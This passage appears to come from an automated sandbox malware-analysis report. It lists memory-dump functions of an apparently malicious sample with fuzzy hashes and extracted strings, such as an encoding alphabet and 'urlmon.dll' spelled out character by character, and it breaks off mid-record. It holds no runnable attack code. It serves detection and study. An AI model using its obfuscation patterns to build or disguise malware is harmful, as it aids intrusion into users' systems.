                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00271fcdd48d942e5fc84c163e515b15cab2e822cd3a3d7d8a1eb820adadb865
                                                                          • Instruction ID: 469cba6cc10db1f49d4bbce5cfb25d3bcd717308670c51a6de6095e5f67b5e06
                                                                          • Opcode Fuzzy Hash: 00271fcdd48d942e5fc84c163e515b15cab2e822cd3a3d7d8a1eb820adadb865
                                                                          • Instruction Fuzzy Hash: 40115EB16412046FE720EB65CC41FEFB7ADEF89710F50454AFA1867240D77069018FA1
                                                                          Function 02FB1D78 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b31ec9e09f9eb7c96ce99a5c9cd9bf128a4e8535fea9889d3f3f4bc2310d8ffb
                                                                          • Instruction ID: cff55395793f71ad8b479293d226165f2b0aac3f25bc865a657485c49c4901fa
                                                                          • Opcode Fuzzy Hash: b31ec9e09f9eb7c96ce99a5c9cd9bf128a4e8535fea9889d3f3f4bc2310d8ffb
                                                                          • Instruction Fuzzy Hash: DF111CF6D0121CAF9B00DFA9DC419EEBBF9EF88240F04456AE909E7200E7715A148FE1
                                                                          Function 02FACCB8 Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f54cd38a2ffc0880c53ea50007c4447b8d8ead75837d05620fa4676408438f4
                                                                          • Instruction ID: aef0baacb176c5a0c6f6a609acf2ed829c5b088ce84fbc7146e02b90f6e93be9
                                                                          • Opcode Fuzzy Hash: 3f54cd38a2ffc0880c53ea50007c4447b8d8ead75837d05620fa4676408438f4
                                                                          • Instruction Fuzzy Hash: DF01F5F6A002142BDB11EA65CC45DEFB36CDF45750F000292FE18D3281FA70AE918BE1
                                                                          Function 02FB4D48 Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 746248510f898547b58a495f5d263584110d952eb93f5070976bf02a7d96825b
                                                                          • Instruction ID: bba62abe347a6a7f5bc4f410e542fc07fb20684272f9cfa1fbb2146ca4833ae7
                                                                          • Opcode Fuzzy Hash: 746248510f898547b58a495f5d263584110d952eb93f5070976bf02a7d96825b
                                                                          • Instruction Fuzzy Hash: 4A0180B2214108BBCB48DE99DC80EEB77ADEF8C754F518219BA09E7241D630E9518BA4
                                                                          Function 02FB09A8 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95c258198893087e09bb4e4bb130e44511d293a1132044b6cb102f9e2b674092
                                                                          • Instruction ID: d3dd945ebc683771d9431bd1a942d524fdd450213950ed485a63a707be03c95d
                                                                          • Opcode Fuzzy Hash: 95c258198893087e09bb4e4bb130e44511d293a1132044b6cb102f9e2b674092
                                                                          • Instruction Fuzzy Hash: E201D7B2C11219AF9B44EFE9D9419EEBBF9AB08600F14456EE915F2200F77456048FA5
                                                                          Function 02FA3650 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 78510075f13f46ee51b03916f2e1061605e68ff157960031d9e8f316750adbab
                                                                          • Instruction ID: 49825bfad79f6eada63ab8221b1d245a2771c608f1c97467bc4662f25796d248
                                                                          • Opcode Fuzzy Hash: 78510075f13f46ee51b03916f2e1061605e68ff157960031d9e8f316750adbab
                                                                          • Instruction Fuzzy Hash: AFF0B4B26803087BF710A7A5CC12F9B728DCB447D0F0542A4BA1CCB380DB2AA5108B65
                                                                          Function 02F8F2E8 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0a638ef27e85ab8218199e0f0ed4dbf07fa6ca77f51002994d0315b717692656
                                                                          • Instruction ID: 44281ab2558fe2df3071b17b23ae0464b6efb466e180a052734f20b67518783a
                                                                          • Opcode Fuzzy Hash: 0a638ef27e85ab8218199e0f0ed4dbf07fa6ca77f51002994d0315b717692656
                                                                          • Instruction Fuzzy Hash: 3EF0A7B36142166BD7106A6EAC40BCAF7DCEB85374F640322FB1C97641E672E49187A0
                                                                          Function 02FA3691 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bc37be71872559968c876f7355181d4f478997d1ba86b329ab1054ad09bb0967
                                                                          • Instruction ID: fc4ad7676e84c446df079a23109815f9a03360bef780f19e5634a436673f8998
                                                                          • Opcode Fuzzy Hash: bc37be71872559968c876f7355181d4f478997d1ba86b329ab1054ad09bb0967
                                                                          • Instruction Fuzzy Hash: 96F046F1D092886EEB02EB90CC88EEEBB79DF96345F0441CAE608A7181D6705999CB55
                                                                          Function 02FB3F58 Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 119182a48d8b336fb3b83eed3a3f8e2727e913e5492745b471c450537a124c4b
                                                                          • Instruction ID: 36403bb4239459ec2aa2360f9e624d0600eabfe4dee081f766bb346d434d60ec
                                                                          • Opcode Fuzzy Hash: 119182a48d8b336fb3b83eed3a3f8e2727e913e5492745b471c450537a124c4b
                                                                          • Instruction Fuzzy Hash: 19F015B6200209BBDB50EF99DC81EDB77ADEFC9750F408019BA19A7241DB70B9518BB0
                                                                          Function 02FB4C68 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e252e55ccb57835924ee9dd489f92114c83014b6ee060e25234b931eaec4e401
                                                                          • Instruction ID: 225c2b222e099293bd12eac94ee999c7c3a07e360ef846d41f75e8590f0603b1
                                                                          • Opcode Fuzzy Hash: e252e55ccb57835924ee9dd489f92114c83014b6ee060e25234b931eaec4e401
                                                                          • Instruction Fuzzy Hash: D5E065B2240704BBD614EE59DC41FDB73ADEF89710F408019FA08A7241CB70B9108BB5
                                                                          Function 02FA35F8 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a56f1866bdde1c370606ddf9861883a8ad16d0273c50ecff81ed478c0b507299
                                                                          • Instruction ID: 0fc144840b02341f1b9da70a5a736f6f7a2c15b730b369dc99f8900bd6c022f5
                                                                          • Opcode Fuzzy Hash: a56f1866bdde1c370606ddf9861883a8ad16d0273c50ecff81ed478c0b507299
                                                                          • Instruction Fuzzy Hash: E1F08271D0520CEBDB14CFA8D841BDDBBB4EF04360F2047AAE9289B380E6359754CB81
                                                                          Function 02FB6B28 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c8d1f4c9ba52db7abdd4ae137ef888bfbdfdfd3410c86f36b598fed1662841bf
                                                                          • Instruction ID: 661bca7f9a31b452a28c05477749604f939c7768e46b19868ecff07fd52b622b
                                                                          • Opcode Fuzzy Hash: c8d1f4c9ba52db7abdd4ae137ef888bfbdfdfd3410c86f36b598fed1662841bf
                                                                          • Instruction Fuzzy Hash: 47E04F72B0121427C622658A9C05FDBB76DDFC2FA0F158064FF089B241E661A91286F5
                                                                          Function 02F8F2DC Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c905f44caec6e597b22e5033886ab0628b0eb5b982a68d8ff0538165d75b1df2
                                                                          • Instruction ID: c841ef6aef5b7bdc9659c4de52f8a015e2010aeaa9827a2fdb640791eadea237
                                                                          • Opcode Fuzzy Hash: c905f44caec6e597b22e5033886ab0628b0eb5b982a68d8ff0538165d75b1df2
                                                                          • Instruction Fuzzy Hash: 48E0DF739081126ECB101AAC6C4488AFB99EEC93B03390322F5AC97290EA328442C7E0
                                                                          Function 02FB4948 Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab2fe83bc1f1512700e73b33eff151b72e072fa436cb93eb6435babd6c785851
                                                                          • Instruction ID: 3928d4a7378a0dc05b26f172a864bcaa60face4f8d9fa86f955868ef0dd649ce
                                                                          • Opcode Fuzzy Hash: ab2fe83bc1f1512700e73b33eff151b72e072fa436cb93eb6435babd6c785851
                                                                          • Instruction Fuzzy Hash: 02E046362402047BD620AA5ACC01FDBB76DDFC6754F80841AFA08B7241D770B9108BB0

                                                                          Non-executed Functions

                                                                          Function 02F9F41C Relevance: 51.4, Strings: 41, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                          • API String ID: 0-3248090998
                                                                          • Opcode ID: 3e9063cd326aa29324555addc1031728d80d4e388c95b62d9b45e758207ec7cc
                                                                          • Instruction ID: ea3a9ec405ad4a2fa08c9aaa56ed645febfd4b4fb71224c50c3cc8e6dafe50b3
                                                                          • Opcode Fuzzy Hash: 3e9063cd326aa29324555addc1031728d80d4e388c95b62d9b45e758207ec7cc
                                                                          • Instruction Fuzzy Hash: 97910EF09052998ADB118F59A4603DEBF71BB85304F1581E9C7A97B203C3BE4E86CF90
                                                                          Function 02F9F428 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                          • API String ID: 0-3248090998
                                                                          • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                          • Instruction ID: 20243457d18c554189dd73b123dcf93a80d4a47e16c77d02b800348de6daaf62
                                                                          • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                          • Instruction Fuzzy Hash: 9591FDF08052A98ADB118F55A4603DFBF71BB85304F1581E9C6AA7B243C3BE4E85DF90
                                                                          Function 02FADF18 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                          • API String ID: 0-1002149817
                                                                          • Opcode ID: cd70124be91b6f14499efb0fc7ea529a741681d0ddee5d92af633f7fb8563b03
                                                                          • Instruction ID: 942dc97e51742b4b57b3e7598af71233570f29445f4b53b25dd06625b8214ad8
                                                                          • Opcode Fuzzy Hash: cd70124be91b6f14499efb0fc7ea529a741681d0ddee5d92af633f7fb8563b03
                                                                          • Instruction Fuzzy Hash: 7DC13FB1D112689AEF21DFA5CC44BEEBBB9AF05344F1081DAD60CB7241E7B54A88CF51
                                                                          Function 02FAAD58 Relevance: 26.5, Strings: 21, Instructions: 250COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $2$Fn$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                          • API String ID: 0-1974708346
                                                                          • Opcode ID: d08ec94afe836715aad5cb20cedae4cdef8fbffd0b3810b548a9bc39ce885ff1
                                                                          • Instruction ID: 6de77e6d28ca9c916f15b0c03001682370180fbcde6a988d68d6c488fb4ef541
                                                                          • Opcode Fuzzy Hash: d08ec94afe836715aad5cb20cedae4cdef8fbffd0b3810b548a9bc39ce885ff1
                                                                          • Instruction Fuzzy Hash: 93915FB1D00218AAEF21DF95CC41FEEB7BDEF45344F4041A9EA0CA6140EB715B898FA1
                                                                          Function 02FA64D8 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • API String ID: 0-392141074
                                                                          • Opcode ID: 6affe173b9e1d84337708409cc17e9545df17ec4a6ed5b1fc74b2cb73ac57161
                                                                          • Instruction ID: 6fe85b41334a53cbda3f203d0e557cdee8a68a17e3bd399440e4b0c0076036e8
                                                                          • Opcode Fuzzy Hash: 6affe173b9e1d84337708409cc17e9545df17ec4a6ed5b1fc74b2cb73ac57161
                                                                          • Instruction Fuzzy Hash: 0D715EB1D10718AEEF21EF95CC40FEEB7BDAF48705F048199E609A6150EB705B488FA1
                                                                          Function 02FA64D5 Relevance: 16.4, Strings: 13, Instructions: 177COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • API String ID: 0-392141074
                                                                          • Opcode ID: 4e6e51a45043f2c519f4d4f466302882e26dee951a993f6ca79f7bcfc44b65a2
                                                                          • Instruction ID: 502a4fce7f72ff95aa1461160d2384e78451a79d314f9428374c925a434657fd
                                                                          • Opcode Fuzzy Hash: 4e6e51a45043f2c519f4d4f466302882e26dee951a993f6ca79f7bcfc44b65a2
                                                                          • Instruction Fuzzy Hash: 21614BB1D10718AEEF21DFA5CC80FEEB7BDAF48705F048199E609A6150EB7157488FA1
                                                                          Function 02F9A178 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                          • API String ID: 0-685823316
                                                                          • Opcode ID: 5e3a93e1ad9d1c71e518a7ff3fc9cc6f03b25d7c7fb960e2b581519f32bfb531
                                                                          • Instruction ID: 1f66145d97b60fcdb32b06972335b8dc54aa4c196fb190e85ebc4d974426b44d
                                                                          • Opcode Fuzzy Hash: 5e3a93e1ad9d1c71e518a7ff3fc9cc6f03b25d7c7fb960e2b581519f32bfb531
                                                                          • Instruction Fuzzy Hash: 612180B1D40218AAEF54DFE4CC44FEEBBB9AF08744F10815DE618BA180DBB55648CFA5
                                                                          Function 02F9A16F Relevance: 13.8, Strings: 11, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                          • API String ID: 0-685823316
                                                                          • Opcode ID: 87575919c793f11ca9e3be101b9a5f20f4909e311324e2b03a690150a0288eff
                                                                          • Instruction ID: 8a4d05004240dec75ca70f2745207b4953743b70cfba0961aa15818fff075b57
                                                                          • Opcode Fuzzy Hash: 87575919c793f11ca9e3be101b9a5f20f4909e311324e2b03a690150a0288eff
                                                                          • Instruction Fuzzy Hash: 8F317EB1D50218AAEF54DF90CC85FEEBBB9AF08744F108158F618BA180DBB51648CFA5
                                                                          Function 02FAB218 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :$:$:$A$I$N$P$m$s$t
                                                                          • API String ID: 0-2304485323
                                                                          • Opcode ID: 300379ae66a6c4f771be8197b611a3df7d1896287248f66661e15edc0b1a9483
                                                                          • Instruction ID: 72dad04a76ea63b3a9fe19db5b3e24be409692a9748d82d4793b88f8b89ef76f
                                                                          • Opcode Fuzzy Hash: 300379ae66a6c4f771be8197b611a3df7d1896287248f66661e15edc0b1a9483
                                                                          • Instruction Fuzzy Hash: BAD1F6F1A10704ABDB10DFA5CC81FEFB7B9AF58344F00492DE219E6240EB79A945CB65
                                                                          Function 02FA15F3 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .$P$e$i$m$o$r$x
                                                                          • API String ID: 0-620024284
                                                                          • Opcode ID: 13d1da38379c5696f61a610b379d860aaa9b427556bfb14acd389dceba30f682
                                                                          • Instruction ID: 680d4b6af1a63aedf6d75c840bb976f947a2ac477a41e4c2c8e3566edeffdd3f
                                                                          • Opcode Fuzzy Hash: 13d1da38379c5696f61a610b379d860aaa9b427556bfb14acd389dceba30f682
                                                                          • Instruction Fuzzy Hash: 174197B6810218B6EF21EFA1CC40FEF737DAF55740F008599A609A7140EBB597898FA0
                                                                          Function 02FA15F8 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .$P$e$i$m$o$r$x
                                                                          • API String ID: 0-620024284
                                                                          • Opcode ID: b0bb17ec4d4e8c85051e1a09d38db31e0374c4181a70d52a6b810084882845ae
                                                                          • Instruction ID: 2d99b691d50c2d7f750b50d9423e71ed2405f912288cb313d26cb6b6311ec9a9
                                                                          • Opcode Fuzzy Hash: b0bb17ec4d4e8c85051e1a09d38db31e0374c4181a70d52a6b810084882845ae
                                                                          • Instruction Fuzzy Hash: F441A7B5C10218B6EF21EBA1CC40FEFB37DAF55740F408599A609A7140EBB597898FA0
                                                                          Function 02FA6298 Relevance: 8.9, Strings: 7, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: F$P$T$f$pK/=$r$x
                                                                          • API String ID: 0-1610201294
                                                                          • Opcode ID: 76dc36f68a3393962a33f7bd849dc149f49b57f9a49d86a3faaccd87c354b198
                                                                          • Instruction ID: fa8c0c59cd76aad4e237572118be4f2bef3e7874b0f76620f124ea81f2ab3341
                                                                          • Opcode Fuzzy Hash: 76dc36f68a3393962a33f7bd849dc149f49b57f9a49d86a3faaccd87c354b198
                                                                          • Instruction Fuzzy Hash: F651F8B1900705AAEF35DF65CD44BEBF7FCEF04784F04465AAA08A6180D3B5A648CFA1
                                                                          Function 02FAE778 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$S$\$a$c$e$l
                                                                          • API String ID: 0-3322591375
                                                                          • Opcode ID: a4d6a088a211a255fa98c983263c868404be1a70d4e3771f17e5704a923e4d3e
                                                                          • Instruction ID: dab6159842ee872eacca8ff5a5ac2e841e10aee6c1cd552caed6f63f6242ebaf
                                                                          • Opcode Fuzzy Hash: a4d6a088a211a255fa98c983263c868404be1a70d4e3771f17e5704a923e4d3e
                                                                          • Instruction Fuzzy Hash: 824173B2C11318AACB10EFA5DC84EEEB7BDEF48740F05856ADA09A7100E7715A458F94
                                                                          Function 02FA628A Relevance: 8.8, Strings: 7, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: F$P$T$f$pK/=$r$x
                                                                          • API String ID: 0-1610201294
                                                                          • Opcode ID: c4c309b435597d8eb73d16d26493d062dd72e3cbc1fd4db8b85e70acc7fddf22
                                                                          • Instruction ID: 92d01469720e350beff10a4653ec54098ca6814a9479667c8edc1e1b75234a3a
